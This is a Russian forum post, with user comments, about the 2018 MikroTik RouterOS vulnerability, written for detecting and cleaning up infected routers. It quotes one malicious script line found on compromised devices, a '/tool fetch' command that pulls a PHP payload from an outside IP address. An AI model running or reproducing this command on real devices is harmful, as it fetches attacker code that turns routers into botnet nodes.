Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Информационная безопасность IT

1.4K постов25.5K подписчиков

Добавить пост

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

Вы смотрите срез комментариев. Показать все
22
DELETED
Автор поста оценил этот комментарий

Компания Microsoft, к примеру, каждую неделю выпускает патчи безопасности, которые закрывают подобного рода дыры и exploit'ы.


С подключением.


RouterOS для того и создавался, чтобы настроить систему под безопасность, а не по умолчанию.

Для этого есть Watchdog. Для этого есть скрипт автообновления.

раскрыть ветку (44)
6
Автор поста оценил этот комментарий
Для этого есть скрипт автообновления

если это не домашний роутер, то никогда им пользоваться не надо

16
Автор поста оценил этот комментарий

А не страшно юзать автообновления? Они там чуть ли не каждую пятницу эти обновления клепают. Мало ли где ошибутся, все роутеры стянут хрен пойми что и лягут...

раскрыть ветку (35)
4
DELETED
Автор поста оценил этот комментарий

Мне страшно жить без обновлений.

Вам стоит пару раз потерять пару серверов, как быстро научитесь ставить обновления как можно быстрей)

раскрыть ветку (5)
1
Автор поста оценил этот комментарий

Я ставлю. Только вначале на один-два роутера. И если они себя нормально ведут, то распространяю дальше. А если нет, то нет.

раскрыть ветку (1)
DELETED
Автор поста оценил этот комментарий

Удачи вам)

Автор поста оценил этот комментарий

А мне страшно с автообновлениями. Уже были преценденты, когда новая прошивка неадекватно работает.

Не вижу никакой проблемы кстати в уязвимости. Если смотреть на ситуацию в целом - уязвимости были, будут и никуда не денутся, даже если обновляться регулярно.

Решение банально и старо - закрываемся файрволлом. Если нужен доступ извне - добавляем ип-адреса в исключения. Если нет возможности (дома динамика например) - настраиваем порт кнокинг и фейл2бан.(Bruteforce login prevention в вики микротика)


Еще лучше - впн до микротика с вышеуказанными правилами.

раскрыть ветку (2)
DELETED
Автор поста оценил этот комментарий
Решение банально и старо - закрываемся файрволлом.

Дыру фаерволом не закрыть.

Поможет вам файрвол на веб сервере, где эксплойт использует дыру в апаче?

Или дыру в работе движка сайта?

и тп.


Еще лучше - впн до микротика с вышеуказанными правилами.

Это теория. На практике не все так легко. ВПН жрет ресурсы аки дикий конь. И когда у вас более 10 клиентов, ваш микротик будет подыхать. И вход и выход прохудится в до 15 метров в лучшем случае.


А мне страшно с автообновлениями. Уже были преценденты, когда новая прошивка неадекватно работает.

Риск всегда есть. Апдейты разные бывают. Но апдейты безопасности должны всегда ставится в день выхода. На страх и риск иногда.

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Если доступ к дыре только у меня, то какая разница, что она не закрыта.


Файрволл на веб сервере конечно поможет, если стоит задача управления, а не доступа для всех
Вы сравниваете теплое и мягкое, вебсервер - для публики, микротик - для админа.
Дырка в сайте - аналогично - для публики...

Про впн до микротика - вот микротик в организации, на нём 600+ л2тп. Что-то делаем не так? Понятно что микротик не 750.


Далее, впн для управления тратит ресурсы того же 750? вы серьезно?

ещё комментарии
Автор поста оценил этот комментарий
Там как я понял уязвимость через порт кнокинг была. Если icmp открыт то беда. Хотя могу ошибаться, так как читал урывками.
раскрыть ветку (3)
DELETED
Автор поста оценил этот комментарий

Тема на форуме называется "дыра в winbox", утилита для подключения под виндой, у неё свой порт, уязвимость использует этот порт для атаки. По этой логике для реализации атаки на самом роутере должен быть включен определенный порт на прием всех входящих, либо отсутствуют базовые настройки firewall. Скажем, повесили сайт, соответственно подняли ftp, админка удаленная и тд, открыли порты, над правилами не заморачиваясь.

раскрыть ветку (2)
Автор поста оценил этот комментарий

Блин ну я заморочился, было закрыто все, кроме winbox. На нем висело правило блока по 3 неудачам, ну типо failtoban. Открытый winbox связан со спецификой. А в итоге я обновил все свои тики, а про тот благополучно забыл, ломанули правые ребята, закрыли дырки, написали обновись. Короче благополучно закончилось все.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Вообще никогда не открываю порты управления в мир. Наружу торчит только порт для openvpn. А вот уже с внутреннего интерфейса можно спокойно и безопасно рулить.

1
Автор поста оценил этот комментарий

Да ебать)))


У меня два микротика для Wi-Fi моста используются. На крыше. На здоровой мачте. Я как-то раз просто в настройках покопался и эта сволочь тупо отказалась заходить в админку и конектиться по маку. Пришлось ночью, лезть на крышу снимать эту хрень, чтоб нажать кнопку reset.


Хоть бы мать их придумали как нибудь через кабель сбрасывать чтоли ...

раскрыть ветку (2)
8
Автор поста оценил этот комментарий

там кнопка Safe Mode есть

2
Автор поста оценил этот комментарий

Как сказал выше оратор Safe Mode, после того как я тоже поездил ради того что ребутнуть его, теперь жму если не уверен.

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку